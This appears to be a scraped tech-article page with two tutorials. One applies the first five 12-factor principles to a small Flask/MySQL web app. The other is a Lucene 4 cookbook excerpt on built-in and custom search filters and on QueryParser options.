How to Build 12 Factor Microservices on Docker - Part 1

Cody A.
26 Jun 2015
9 min read

As companies continue to reap benefits of the cloud beyond cost savings, DevOps teams are gradually transforming their infrastructure into a self-serve platform. Critical to this effort is designing applications to be cloud-native and antifragile. In this post series, we will examine the 12 factor methodology for application design, look at how this design approach interfaces with some of the more popular Platform-as-a-Service (PaaS) providers, and demonstrate how to run such microservices on the Deis PaaS.

What began as Service-Oriented Architectures in the data center is realizing its full potential as microservices in the cloud, led by innovators such as Netflix and Heroku. Netflix was arguably the first to design its applications to be not only resilient but antifragile; that is, by intentionally introducing chaos into its systems, its applications become more stable, scalable, and graceful in the presence of errors. Similarly, by helping thousands of clients build cloud applications, Heroku recognized a set of common patterns emerging and set forth the 12 factor methodology.

ANTIFRAGILITY

You may have never heard of antifragility. The concept was introduced by Nassim Taleb, the author of Fooled by Randomness and The Black Swan. Essentially, something antifragile gains from volatility and uncertainty (up to a point). Think of the MySQL server that everyone is afraid to touch lest it crash versus the Cassandra ring that can handle the loss of multiple servers without a problem. In terms more familiar to the tech crowd, a "pet" is fragile while "cattle" are antifragile (or at least robust; that is, they neither gain nor lose from volatility).

Adrian Cockcroft seems to have discovered this concept with his team at Netflix. During their transition from a data center to Amazon Web Services, they claimed that "the best way to avoid failure is to fail constantly" (http://techblog.netflix.com/2010/12/5-lessons-weve-learned-using-aws.html). To facilitate this process, one of the first tools Netflix built was Chaos Monkey, the now-infamous tool that kills your Amazon instances to see if and how well your application responds. By constantly injecting failure, their engineers were forced to design their applications to be more fault tolerant, to degrade gracefully, and to be better distributed so as to avoid any Single Points of Failure (SPOF). As a result, Netflix has a whole suite of tools that form the Netflix PaaS. Many of these have been released as part of the Netflix OSS ecosystem.

12 FACTOR APPS

Because many companies want to avoid relying too heavily on tools from any single third party, it may be more beneficial to look at the concepts underlying such a cloud-native design. This will also help you evaluate and compare multiple options for solving the core issues at hand. Heroku, being a platform on which thousands or millions of applications are deployed, has had to isolate the core design patterns for applications that operate in the cloud and provide an environment that makes such applications easy to build and maintain. These patterns are described in a manifesto entitled the 12-Factor App.

The first part of this post walks through the first five factors and reworks a simple Python webapp with them in mind. Part 2 continues with the remaining seven factors, demonstrating how this design allows easier integration with cloud-native containerization technologies like Docker and Deis.

Let's say we're starting with a minimal Python application which simply provides a way to view some content from a relational database. We'll start with a single-file application, app.py.

from flask import Flask
import mysql.connector as db
import json

app = Flask(__name__)

def execute(query):
    con = None
    try:
        con = db.connect(host='localhost', user='testdb', password='t123', database='testdb')
        cur = con.cursor()
        cur.execute(query)
        return cur.fetchall()
    except db.Error, e:
        print "Error %d: %s" % (e.args[0], e.args[1])
        return None
    finally:
        if con:
            con.close()

def list_users():
    users = execute("SELECT id, username, email FROM users") or []
    return [{"id": user_id, "username": username, "email": email}
            for (user_id, username, email) in users]

@app.route("/users")
def users_index():
    return json.dumps(list_users())

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000, debug=True)

We can assume you have a simple MySQL database set up already.

CREATE DATABASE testdb;
CREATE TABLE users (
    id INT NOT NULL AUTO_INCREMENT,
    username VARCHAR(80) NOT NULL,
    email VARCHAR(120) NOT NULL,
    PRIMARY KEY (id),
    UNIQUE INDEX (username),
    UNIQUE INDEX (email)
);
INSERT INTO users VALUES (1, "admin", "admin@example.com");
INSERT INTO users VALUES (2, "guest", "guest@example.com");

As you can see, the application currently takes about the most naive approach possible and is contained within this single file. We'll now walk step by step through the 12 Factors and apply them to this simple application.

THE 12 FACTORS: STEP BY STEP

Codebase. A 12-factor app is always tracked in a version control system, such as Git, Mercurial, or Subversion. If there are multiple codebases, it's a distributed system in which each component may be a 12-factor app. There are many deploys, or running instances, of each application, including production, staging, and developers' local environments.

Since many people are familiar with git today, let's choose that as our version control system. We can initialize a git repo for our new project. First ensure we're in the app directory which, at this point, only contains the single app.py file.

cd 12factor
git init .

After adding the single app.py file, we can commit to the repo.

git add app.py
git commit -m "Initial commit"

Dependencies. All dependencies must be explicitly declared and isolated. A 12-factor app never depends on packages being installed system-wide, and it uses a dependency isolation tool during execution to stop any system-wide packages from "leaking in." Good examples are Gem Bundler for Ruby (the Gemfile provides declaration and `bundle exec` provides isolation) and pip/requirements.txt and virtualenv for Python (where pip/requirements.txt provides declaration and `virtualenv --no-site-packages` provides isolation).

We can create and use (source) a virtualenv environment which explicitly isolates the local app's environment from the global "site-packages" installations.

virtualenv env --no-site-packages
source env/bin/activate

A quick glance at the code shows that we're only using two dependencies currently, flask and mysql-connector-python, so we'll add them to the requirements file.

echo flask==0.10.1 >> requirements.txt
echo mysql-connector-python >> requirements.txt

Let's use the requirements file to install all the dependencies into our isolated virtualenv.

pip install -r requirements.txt

Config. An app's config must be stored in environment variables. This config is what may vary between deploys in developer environments, staging, and production.

The most common example is the database credentials or resource handle. We currently have the host, user, password, and database name hardcoded. Hopefully you've at least already extracted these into a configuration file; either way, we'll be moving them to environment variables instead.

import os
DATABASE_CREDENTIALS = {
    'host': os.environ['DATABASE_HOST'],
    'user': os.environ['DATABASE_USER'],
    'password': os.environ['DATABASE_PASSWORD'],
    'database': os.environ['DATABASE_NAME']
}

Don't forget to update the actual connection to use the new credentials object:

con = db.connect(**DATABASE_CREDENTIALS)

Backing Services. A 12-factor app must make no distinction between a service running locally or as a third party. For example, a deploy should be able to swap out a local MySQL database for a third-party replacement such as Amazon RDS without any code changes, just by updating a URL or other handle/credentials inside the config.

Using a database abstraction layer such as SQLAlchemy (or your own adapter) lets you treat many backing services similarly so that you can switch between them with a single configuration parameter. In this case, it has the added advantage of serving as an Object Relational Mapper to better encapsulate our database access logic. We can replace the hand-rolled execute function and SELECT query with a model object:

from flask.ext.sqlalchemy import SQLAlchemy

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']
db = SQLAlchemy(app)

class User(db.Model):
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True)
    email = db.Column(db.String(120), unique=True)

    def __init__(self, username, email):
        self.username = username
        self.email = email

    def __repr__(self):
        return '<User %r>' % self.username

@app.route("/users")
def users_index():
    to_json = lambda user: {"id": user.id, "name": user.username, "email": user.email}
    return json.dumps([to_json(user) for user in User.query.all()])

Now we set the DATABASE_URL environment property to something like

export DATABASE_URL=mysql://testdb:t123@localhost/testdb

But it should be easy to switch to Postgres or to Amazon RDS (still backed by MySQL).

DATABASE_URL=postgresql://testdb:t123@localhost/testdb

We'll continue this demo using a MySQL cluster provided by Amazon RDS.

DATABASE_URL=mysql://sa:mypwd@mydbinstance.abcdefghijkl.us-west-2.rds.amazonaws.com/mydb

As you can see, this makes attaching and detaching from different backing services trivial from a code perspective, allowing you to focus on more challenging issues. This is important during the early stages of a project because it allows you to performance test multiple databases and third-party providers against one another, and in general it keeps with the notion of avoiding vendor lock-in.

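For reference, here is a minimal consolidated sketch of what app.py looks like with the changes applied so far (configuration read from the environment, SQLAlchemy as the database abstraction layer). It simply stitches together the snippets above and trims the model to its essentials; it is one possible layout, not a prescription of the methodology.

import os
import json
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy

app = Flask(__name__)
# Factor III (Config): the database handle comes from the environment, not the code.
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']
db = SQLAlchemy(app)

# Factor IV (Backing services): the model does not care which database backs it.
class User(db.Model):
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True)
    email = db.Column(db.String(120), unique=True)

@app.route("/users")
def users_index():
    to_json = lambda user: {"id": user.id, "name": user.username, "email": user.email}
    return json.dumps([to_json(user) for user in User.query.all()])

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000, debug=True)
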
In Part 2, we'll continue reworking this application so that it fully conforms to the 12 Factors. The remaining seven factors concern the overall application design and how it interacts with the execution environment in which it's operated. We'll assume that we're operating the app in a multi-container Docker environment. This container-up approach provides the most flexibility and control over your execution environment. We'll then conclude the article by deploying our application to Deis, a vertically integrated Docker-based PaaS, to demonstrate the tradeoff of configuration vs convention in selecting your own PaaS.

About the Author

Cody A. Ray is an inquisitive, tech-savvy, entrepreneurially-spirited dude. Currently, he is a software engineer at Signal, an amazing startup in downtown Chicago, where he gets to work with a dream team that's changing the service model underlying the Internet.

Querying and Filtering Data

Packt
25 Jun 2015
28 min read

In this article by Edwood Ng and Vineeth Mohan, authors of the book Lucene 4 Cookbook, we will cover the following recipes:

- Performing advanced filtering
- Creating a custom filter
- Searching with QueryParser
- TermQuery and TermRangeQuery
- BooleanQuery
- PrefixQuery and WildcardQuery
- PhraseQuery and MultiPhraseQuery
- FuzzyQuery

(For more resources related to this topic, see here.)

When it comes to search applications, usability is always a key element that either makes or breaks user impression. Lucene does an excellent job of giving you the essential tools to build and search an index. In this article, we will look into some more advanced techniques to query and filter data. We will arm you with more knowledge to put into your toolbox so that you can leverage your Lucene knowledge to build a user-friendly search application.

Performing advanced filtering

Before we start, let us try to revisit these questions: what is a filter and what is it for? In simple terms, a filter is used to narrow the search space or, in other words, to search within a search. Filter and Query may seem to provide the same functionality, but there is a significant difference between the two: scores are calculated during querying to rank results based on their relevancy to the search terms, while a filter has no effect on scores.

It's not uncommon for users to prefer navigating through a hierarchy of filters in order to land on the relevant results. You may often find yourself in a situation where it is necessary to refine a result set so that users can continue to search or navigate within a subset. With the ability to apply filters, we can easily provide such search refinements. Another situation is data security, where some parts of the data in the index are protected. You may need to include an additional filter behind the scenes, based on user access level, so that users are restricted to seeing only the items that they are permitted to access. In both of these contexts, Lucene's filtering features provide the capability to achieve the objectives.

Lucene has a few built-in filters that are designed to fit most real-world applications. If you do find yourself in a position where none of the built-in filters are suitable for the job, you can rest assured that Lucene's extensibility will allow you to build your own custom filters. Let us take a look at Lucene's built-in filters:

- TermRangeFilter: This filter restricts results to a range of terms defined by the lower bound and upper bound of a submitted range. It is best used on a single-valued field because, on a tokenized field, any token within the range will be returned by this filter. This is for textual data only.
- NumericRangeFilter: Similar to TermRangeFilter, this filter restricts results to a range of numeric values.
- FieldCacheRangeFilter: This filter runs on top of the other range filters, including TermRangeFilter and NumericRangeFilter. It caches filtered results using FieldCache for improved performance. FieldCache is stored in memory, so the performance boost can be upward of 100x compared to the normal range filters. Because it uses FieldCache, it's best to use this on a single-valued field only. This filter is not applicable to multivalued fields, or when available memory is limited, since it maintains the FieldCache (in memory) on filtered results.
- QueryWrapperFilter: This filter acts as a wrapper around a Query object.
This filter is useful when you have complex business rules that are already defined in a Query and you would like to reuse them for other purposes. It constructs a Query to act like a filter so that it can be applied to other Queries. Because this is a filter, the scoring of the wrapped Query is irrelevant.
- PrefixFilter: This filter restricts results to those that match the defined prefix. This is similar to a substring match, but limited to matching results with a leading substring only.
- FieldCacheTermsFilter: This is a term filter that uses FieldCache to store the calculated results in memory. This filter works on a single-valued field only. One use of it is when you have a category field and results are usually shown by category on different pages. The filter can be used as a demarcation by category.
- FieldValueFilter: This filter returns documents containing one or more values in the specified field. This is useful as a preliminary filter to ensure that certain fields exist before querying.
- CachingWrapperFilter: This is a wrapper that adds a caching layer to a filter to boost performance. Note that this filter provides a general caching layer; it should be applied to a filter that produces a reasonably small result set, such as an exact match. Otherwise, larger results may unnecessarily drain the system's resources and can actually introduce performance issues.

If none of the above filters fulfill your business requirements, you can build your own by extending the Filter class and implementing its abstract method getDocIdSet(AtomicReaderContext, Bits).

How to do it...

Let's set up our test case with the following code:

Analyzer analyzer = new StandardAnalyzer();
Directory directory = new RAMDirectory();
IndexWriterConfig config = new IndexWriterConfig(Version.LATEST, analyzer);
IndexWriter indexWriter = new IndexWriter(directory, config);
Document doc = new Document();
StringField stringField = new StringField("name", "", Field.Store.YES);
TextField textField = new TextField("content", "", Field.Store.YES);
IntField intField = new IntField("num", 0, Field.Store.YES);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("First");
textField.setStringValue("Humpty Dumpty sat on a wall,");
intField.setIntValue(100);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("Second");
textField.setStringValue("Humpty Dumpty had a great fall.");
intField.setIntValue(200);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("Third");
textField.setStringValue("All the king's horses and all the king's men");
intField.setIntValue(300);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("Fourth");
textField.setStringValue("Couldn't put Humpty together again.");
intField.setIntValue(400);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

indexWriter.commit();
indexWriter.close();

IndexReader indexReader = DirectoryReader.open(directory);
IndexSearcher indexSearcher = new IndexSearcher(indexReader);

How it works…

The preceding code adds four documents into an index.
The four documents are:

Document 1 – Name: First, Content: "Humpty Dumpty sat on a wall,", Num: 100
Document 2 – Name: Second, Content: "Humpty Dumpty had a great fall.", Num: 200
Document 3 – Name: Third, Content: "All the king's horses and all the king's men", Num: 300
Document 4 – Name: Fourth, Content: "Couldn't put Humpty together again.", Num: 400

Here is our standard test case:

IndexReader indexReader = DirectoryReader.open(directory);
IndexSearcher indexSearcher = new IndexSearcher(indexReader);
Query query = new TermQuery(new Term("content", "humpty"));
TopDocs topDocs = indexSearcher.search(query, FILTER, 100);
System.out.println("Searching 'humpty'");
for (ScoreDoc scoreDoc : topDocs.scoreDocs) {
    doc = indexReader.document(scoreDoc.doc);
    System.out.println("name: " + doc.getField("name").stringValue() +
        " - content: " + doc.getField("content").stringValue() +
        " - num: " + doc.getField("num").stringValue());
}
indexReader.close();

Running the code as it is will produce the following output, assuming the FILTER variable is declared (and set to null, so no filter is applied yet):

Searching 'humpty'
name: First - content: Humpty Dumpty sat on a wall, - num: 100
name: Second - content: Humpty Dumpty had a great fall. - num: 200
name: Fourth - content: Couldn't put Humpty together again. - num: 400

This is a simple search on the word humpty. The search returns the first, second, and fourth sentences.

Now, let's take a look at a TermRangeFilter example:

TermRangeFilter termRangeFilter = TermRangeFilter.newStringRange("name", "A", "G", true, true);

Applying this filter to the preceding search (by setting FILTER to termRangeFilter) will produce the following output:

Searching 'humpty'
name: First - content: Humpty Dumpty sat on a wall, - num: 100
name: Fourth - content: Couldn't put Humpty together again. - num: 400

Note that the second sentence is missing from the results due to this filter. The filter removes documents whose name is outside of A through G. Both the first and fourth sentences have names (First and Fourth) starting with F, which is within the range, so their results are included. The second sentence's name value, Second, is outside the range, so that document is not considered by the query.

Let's move on to NumericRangeFilter:

NumericRangeFilter numericRangeFilter = NumericRangeFilter.newIntRange("num", 200, 400, true, true);

This filter will produce the following results:

Searching 'humpty'
name: Second - content: Humpty Dumpty had a great fall. - num: 200
name: Fourth - content: Couldn't put Humpty together again. - num: 400

Note that the first sentence is missing from the results. That's because its num value, 100, is outside the numeric range 200 to 400 specified in NumericRangeFilter.

Next one is FieldCacheRangeFilter:

FieldCacheRangeFilter fieldCacheTermRangeFilter = FieldCacheRangeFilter.newStringRange("name", "A", "G", true, true);

The output of this filter is similar to the TermRangeFilter example:

Searching 'humpty'
name: First - content: Humpty Dumpty sat on a wall, - num: 100
name: Fourth - content: Couldn't put Humpty together again. - num: 400

This filter provides a caching layer on top of TermRangeFilter. The results are similar, but performance is a lot better because the calculated results are cached in memory for the next retrieval.

Next is QueryWrapperFilter:

QueryWrapperFilter queryWrapperFilter = new QueryWrapperFilter(new TermQuery(new Term("content", "together")));

This example will produce this result:

Searching 'humpty'
name: Fourth - content: Couldn't put Humpty together again. - num: 400

This filter wraps around a TermQuery on the term together in the content field.
Since the fourth sentence is the only one that contains the word "together", the search results are limited to this sentence only.

Next one is PrefixFilter:

PrefixFilter prefixFilter = new PrefixFilter(new Term("name", "F"));

This filter produces the following:

Searching 'humpty'
name: First - content: Humpty Dumpty sat on a wall, - num: 100
name: Fourth - content: Couldn't put Humpty together again. - num: 400

This filter limits results to documents whose name field begins with the letter F. In this case, the first and fourth sentences both have a name field that begins with F (First and Fourth); hence the results.

Next is FieldCacheTermsFilter:

FieldCacheTermsFilter fieldCacheTermsFilter = new FieldCacheTermsFilter("name", "First");

This filter produces the following:

Searching 'humpty'
name: First - content: Humpty Dumpty sat on a wall, - num: 100

This filter limits results to documents whose name field contains the term First. Since the first sentence is the only one with that value, only one sentence is returned in the search results.

Next is FieldValueFilter:

FieldValueFilter fieldValueFilter = new FieldValueFilter("name1");

This would produce the following:

Searching 'humpty'

Note that there are no results because this filter limits results to documents in which there is at least one value in the field name1. Since the name1 field doesn't exist in our current example, no documents are returned by this filter; hence, zero results.

Next is CachingWrapperFilter:

TermRangeFilter termRangeFilter = TermRangeFilter.newStringRange("name", "A", "G", true, true);
CachingWrapperFilter cachingWrapperFilter = new CachingWrapperFilter(termRangeFilter);

This wrapper wraps around the same TermRangeFilter from above, so the result produced is similar:

Searching 'humpty'
name: First - content: Humpty Dumpty sat on a wall, - num: 100
name: Fourth - content: Couldn't put Humpty together again. - num: 400

Filters work in conjunction with Queries to refine the search results. As you may have already noticed, the benefit of a Filter is its ability to cache results, while a Query calculates in real time. When choosing between Filter and Query, you will want to ask yourself whether the search (or filtering) will be repeated. Provided you have enough memory allocated, a cached Filter will always have a positive impact on search experiences.

Creating a custom filter

Now that we've seen numerous examples of Lucene's built-in Filters, we are ready for a more advanced topic, custom filters. There are a few important components we need to go over before we start: FieldCache, SortedDocValues, and DocIdSet. We will be using these items in our example to help you gain practical knowledge on the subject.

The FieldCache, as you already learned, is a cache that stores field values in memory in an array structure. It's a very simple data structure, as the slots in the array basically correspond to DocIds. This is also the reason why FieldCache only works for a single-valued field: a slot in the array can only hold a single value. Since this is just an array, the lookup time is constant and very fast.

The SortedDocValues has two internal data mappings for value lookup: a dictionary mapping an ordinal value to a field value, and a mapping from a DocId to an ordinal value (for the field value). In the dictionary data structure, the values are deduplicated, dereferenced, and sorted. There are two methods of interest in this class: getOrd(int) and lookupTerm(BytesRef).
The getOrd(int) method returns an ordinal for a DocId (int), and lookupTerm(BytesRef) returns an ordinal for a field value. This data structure is the opposite of the inverted index structure, as it provides a DocId-to-value lookup (similar to FieldCache), instead of a value-to-DocId lookup.

DocIdSet, as the name implies, is a set of DocIds. The FieldCacheDocIdSet subclass we will be using is a combination of this set and FieldCache. It iterates through the set and calls matchDoc(int) to find all the matching documents to be returned.

In our example, we will be building a simple user security Filter to determine which documents are eligible to be viewed by a user, based on the user ID and group ID. The group ID is assumed to be hierarchical, whereby a smaller ID inherits the rights of a larger ID. For example, the following will be our group ID model in our implementation:

10 – admin
20 – manager
30 – user
40 – guest

A user with group ID 10 will be able to access documents whose group ID is 10 or above.

How to do it...

Here is our custom Filter, UserSecurityFilter:

public class UserSecurityFilter extends Filter {

    private String userIdField;
    private String groupIdField;
    private String userId;
    private String groupId;

    public UserSecurityFilter(String userIdField, String groupIdField, String userId, String groupId) {
        this.userIdField = userIdField;
        this.groupIdField = groupIdField;
        this.userId = userId;
        this.groupId = groupId;
    }

    public DocIdSet getDocIdSet(AtomicReaderContext context, Bits acceptDocs) throws IOException {
        final SortedDocValues userIdDocValues = FieldCache.DEFAULT.getTermsIndex(context.reader(), userIdField);
        final SortedDocValues groupIdDocValues = FieldCache.DEFAULT.getTermsIndex(context.reader(), groupIdField);

        final int userIdOrd = userIdDocValues.lookupTerm(new BytesRef(userId));
        final int groupIdOrd = groupIdDocValues.lookupTerm(new BytesRef(groupId));

        return new FieldCacheDocIdSet(context.reader().maxDoc(), acceptDocs) {
            @Override
            protected final boolean matchDoc(int doc) {
                final int userIdDocOrd = userIdDocValues.getOrd(doc);
                final int groupIdDocOrd = groupIdDocValues.getOrd(doc);
                return userIdDocOrd == userIdOrd || groupIdDocOrd >= groupIdOrd;
            }
        };
    }
}

This Filter accepts four arguments in its constructor:

- userIdField: This is the field name for the user ID
- groupIdField: This is the field name for the group ID
- userId: This is the current session's user ID
- groupId: This is the current session's group ID of the user

Then, we implement getDocIdSet(AtomicReaderContext, Bits) to perform our filtering by userId and groupId. We first acquire two SortedDocValues, one for the user ID and one for the group ID, based on the field names we obtained from the constructor. Then, we look up the ordinal values for the current session's user ID and group ID. The return value is a new FieldCacheDocIdSet object implementing its matchDoc(int) method. This is where we compare both the user ID and group ID to determine whether a document is viewable by the user. A match occurs when either the user ID matches or the document's group ID is greater than or equal to the user's group ID.

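If the ordinal arithmetic feels abstract, the following minimal standalone sketch (an illustration, not part of the recipe) checks a single document against the groupId field using only the getOrd and lookupTerm calls described above. It assumes a Lucene 4.x AtomicReaderContext named context and that the value "30" actually exists in the index.

import java.io.IOException;

import org.apache.lucene.index.AtomicReaderContext;
import org.apache.lucene.index.SortedDocValues;
import org.apache.lucene.search.FieldCache;
import org.apache.lucene.util.BytesRef;

public class OrdinalLookupSketch {
    // Returns true if the document's groupId term sorts at or after "30".
    static boolean groupAtLeast30(AtomicReaderContext context, int docId) throws IOException {
        SortedDocValues groupIds = FieldCache.DEFAULT.getTermsIndex(context.reader(), "groupId");
        int ordFor30 = groupIds.lookupTerm(new BytesRef("30")); // value-to-ordinal lookup
        int docOrd = groupIds.getOrd(docId);                    // DocId-to-ordinal lookup
        // Ordinals follow the sorted order of the terms, so comparing ordinals
        // compares the underlying group IDs, which is what matchDoc(int) relies on.
        return docOrd >= ordFor30;
    }
}
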
To test this Filter, we will set up our index as follows:

Analyzer analyzer = new StandardAnalyzer();
Directory directory = new RAMDirectory();
IndexWriterConfig config = new IndexWriterConfig(Version.LATEST, analyzer);
IndexWriter indexWriter = new IndexWriter(directory, config);
Document doc = new Document();
StringField stringFieldFile = new StringField("file", "", Field.Store.YES);
StringField stringFieldUserId = new StringField("userId", "", Field.Store.YES);
StringField stringFieldGroupId = new StringField("groupId", "", Field.Store.YES);

doc.removeField("file"); doc.removeField("userId"); doc.removeField("groupId");
stringFieldFile.setStringValue("Z:\\shared\\finance\\2014-sales.xls");
stringFieldUserId.setStringValue("1001");
stringFieldGroupId.setStringValue("20");
doc.add(stringFieldFile); doc.add(stringFieldUserId); doc.add(stringFieldGroupId);
indexWriter.addDocument(doc);

doc.removeField("file"); doc.removeField("userId"); doc.removeField("groupId");
stringFieldFile.setStringValue("Z:\\shared\\company\\2014-policy.doc");
stringFieldUserId.setStringValue("1101");
stringFieldGroupId.setStringValue("30");
doc.add(stringFieldFile); doc.add(stringFieldUserId); doc.add(stringFieldGroupId);
indexWriter.addDocument(doc);

doc.removeField("file"); doc.removeField("userId"); doc.removeField("groupId");
stringFieldFile.setStringValue("Z:\\shared\\company\\2014-terms-and-conditions.doc");
stringFieldUserId.setStringValue("1205");
stringFieldGroupId.setStringValue("40");
doc.add(stringFieldFile); doc.add(stringFieldUserId); doc.add(stringFieldGroupId);
indexWriter.addDocument(doc);

indexWriter.commit();
indexWriter.close();

The setup adds three documents to our index, each with different user ID and group ID settings. We then search with the Filter applied, as follows:

UserSecurityFilter userSecurityFilter = new UserSecurityFilter("userId", "groupId", "1001", "40");
IndexReader indexReader = DirectoryReader.open(directory);
IndexSearcher indexSearcher = new IndexSearcher(indexReader);
Query query = new MatchAllDocsQuery();
TopDocs topDocs = indexSearcher.search(query, userSecurityFilter, 100);
for (ScoreDoc scoreDoc : topDocs.scoreDocs) {
    doc = indexReader.document(scoreDoc.doc);
    System.out.println("file: " + doc.getField("file").stringValue() +
        " - userId: " + doc.getField("userId").stringValue() +
        " - groupId: " + doc.getField("groupId").stringValue());
}
indexReader.close();

We initialize UserSecurityFilter with the matching names for the user ID and group ID fields, and set it up with user ID 1001 and group ID 40. For our test and search, we use MatchAllDocsQuery to basically search without any queries (as it will return all the documents). Here is the output from the code:

file: Z:\shared\finance\2014-sales.xls - userId: 1001 - groupId: 20
file: Z:\shared\company\2014-terms-and-conditions.doc - userId: 1205 - groupId: 40

The search specifically filters by user ID 1001, so the first document is returned because its user ID is also 1001. The third document is returned because its group ID, 40, is greater than or equal to the user's group ID, which is also 40.

Searching with QueryParser

QueryParser is an interpreter tool that transforms a search string into a series of Query clauses. It's not absolutely necessary to use QueryParser to perform a search, but it's a great feature that empowers users by allowing the use of search modifiers. A user can specify a phrase match by putting quotes (") around a phrase.
A user can also control whether a certain term or phrase is required by putting a plus ("+") sign in front of the term or phrase, or use a minus ("-") sign to indicate that the term or phrase must not exist in the results. For Boolean searches, the user can use AND and OR to control whether all terms or phrases are required.

To do a field-specific search, you can use a colon (":") to specify a field for a search (for example, content:humpty would search for the term humpty in the field content). For wildcard searches, you can use the standard wildcard character asterisk ("*") to match 0 or more characters, or a question mark ("?") to match a single character.

As you can see, the general syntax for a search query is not complicated, though the more advanced modifiers can seem daunting to new users. In this article, we will cover more advanced QueryParser features to show you what you can do to customize a search.

How to do it...

Let's look at the options that we can set in QueryParser. The following is a code snippet for our setup:

Analyzer analyzer = new StandardAnalyzer();
Directory directory = new RAMDirectory();
IndexWriterConfig config = new IndexWriterConfig(Version.LATEST, analyzer);
IndexWriter indexWriter = new IndexWriter(directory, config);
Document doc = new Document();
StringField stringField = new StringField("name", "", Field.Store.YES);
TextField textField = new TextField("content", "", Field.Store.YES);
IntField intField = new IntField("num", 0, Field.Store.YES);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("First");
textField.setStringValue("Humpty Dumpty sat on a wall,");
intField.setIntValue(100);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("Second");
textField.setStringValue("Humpty Dumpty had a great fall.");
intField.setIntValue(200);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("Third");
textField.setStringValue("All the king's horses and all the king's men");
intField.setIntValue(300);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

doc.removeField("name"); doc.removeField("content"); doc.removeField("num");
stringField.setStringValue("Fourth");
textField.setStringValue("Couldn't put Humpty together again.");
intField.setIntValue(400);
doc.add(stringField); doc.add(textField); doc.add(intField);
indexWriter.addDocument(doc);

indexWriter.commit();
indexWriter.close();

IndexReader indexReader = DirectoryReader.open(directory);
IndexSearcher indexSearcher = new IndexSearcher(indexReader);
QueryParser queryParser = new QueryParser("content", analyzer);
// configure queryParser here
Query query = queryParser.parse("humpty");
TopDocs topDocs = indexSearcher.search(query, 100);

We add four documents and instantiate a QueryParser object with a default field and an analyzer. We will be using the same analyzer that was used in indexing to ensure that we apply the same text treatment to maximize matching capability.

Wildcard search

The query syntax for a wildcard search is the asterisk ("*") or question mark ("?") character. Here is a sample query:

Query query = queryParser.parse("humpty*");

This query will return the first, second, and fourth sentences.
By default, QueryParser does not allow a leading wildcard character because it has a significant performance impact. A leading wildcard would trigger a full scan on the index, since any term could be a potential match; in essence, even an inverted index becomes rather useless for a leading wildcard search. However, it's possible to override this default by calling setAllowLeadingWildcard(true). You can go ahead and run this example with different search strings to see how this feature works. Depending on where the wildcard character(s) is placed, QueryParser will produce either a PrefixQuery or a WildcardQuery. In this specific example, in which there is only one wildcard character and it's not the leading character, a PrefixQuery is produced.

Term range search

We can produce a TermRangeQuery by using TO in a search string. The range has the following syntax:

[start TO end] – inclusive
{start TO end} – exclusive

As indicated, the square brackets ([ and ]) are inclusive of the start and end terms, and the curly brackets ({ and }) are exclusive of the start and end terms. It's also possible to mix these brackets to be inclusive on one side and exclusive on the other. Here is a code snippet:

Query query = queryParser.parse("[aa TO c]");

This search will return the third and fourth sentences, as their beginning words are All and Couldn't, which fall within the range. You can optionally analyze the range terms with the same analyzer by setting setAnalyzeRangeTerms(true).

Autogenerated phrase query

QueryParser can automatically generate a PhraseQuery when there is more than one term in a search string. Here is a code snippet:

queryParser.setAutoGeneratePhraseQueries(true);
Query query = queryParser.parse("humpty+dumpty+sat");

This search will generate a PhraseQuery on the phrase humpty dumpty sat and will return the first sentence.

Date resolution

If you have a date field (by using DateTools to convert a date to a string format) and would like to do a range search on dates, it may be necessary to match the date resolution on a specific field. Here is a code snippet on setting the date resolution:

queryParser.setDateResolution("date", DateTools.Resolution.DAY);
queryParser.setLocale(Locale.US);
queryParser.setTimeZone(TimeZone.getTimeZone("America/New_York"));

This example sets the resolution to day granularity, the locale to US, and the time zone to New York. The locale and time zone settings are specific to the date format only.

Default operator

The default operator on a multiterm search string is OR. You can change the default to AND so that all the terms are required. Here is a code snippet that will require all the terms in a search string:

queryParser.setDefaultOperator(QueryParser.Operator.AND);
Query query = queryParser.parse("humpty dumpty");

This example will return the first and second sentences, as these are the only two sentences with both humpty and dumpty.

Enable position increments

This setting is enabled by default. Its purpose is to maintain a position increment for the token that follows an omitted token, such as a token filtered by a StopFilter. This is useful in phrase queries when position increments may be important for scoring. Here is an example of how to enable this setting:

queryParser.setEnablePositionIncrements(true);
Query query = queryParser.parse("\"humpty dumpty\"");

In our scenario, it won't change our search results. This attribute only enables position increment information to be available in the resulting PhraseQuery.

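Since each of these options is just a setter on the same parser instance, they compose naturally. Here is a small sketch, in the same style as the snippets above (it reuses the analyzer and indexSearcher from the setup, and the particular settings are chosen arbitrarily for illustration):

QueryParser queryParser = new QueryParser("content", analyzer);
queryParser.setAllowLeadingWildcard(true);                 // permit leading-wildcard queries (slower)
queryParser.setDefaultOperator(QueryParser.Operator.AND);  // require every term by default
queryParser.setAutoGeneratePhraseQueries(true);            // multi-term tokens become phrases
queryParser.setEnablePositionIncrements(true);             // keep gaps left by removed stopwords
Query query = queryParser.parse("humpty dumpty*");
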